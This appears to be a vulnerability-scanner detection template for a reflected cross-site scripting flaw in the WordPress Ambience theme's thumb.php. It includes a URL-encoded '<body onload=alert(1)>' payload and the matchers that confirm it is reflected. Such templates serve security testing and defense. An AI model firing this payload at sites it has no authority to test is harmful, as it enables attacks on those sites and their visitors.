id: wp-ambience-xss

info:
  name: WordPress Ambience Theme <=1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability.
  reference:
    - https://www.exploit-db.com/expl oits/38568
    - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  tags: wp-plugin,wp,edb,wpscan,wordpress,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<body onload=alert(1)>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07
